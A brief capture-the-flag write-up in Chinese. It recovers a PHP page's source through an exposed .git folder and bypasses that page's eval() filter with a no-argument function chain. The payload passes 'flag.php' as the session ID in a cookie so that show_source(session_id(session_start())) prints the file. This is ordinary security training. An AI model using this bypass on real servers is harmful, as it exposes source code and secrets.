|
打开题目,无提示。先扫描目录,发现存在.git文件以及一个flag.php文件。
利用GitHack得到index.php源码
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
?>
注意这段代码preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])
那么很显然是无参数函数RCE,在网上已有大量payload,利用现成payload即可得到flag
有一个巧妙的方法是,利用cookies传递参数
在HTTP请求头里,手动添加Cookies: PHPSESSID=flag.php
GET参数为exp=show_source(session_id(session_start()));
|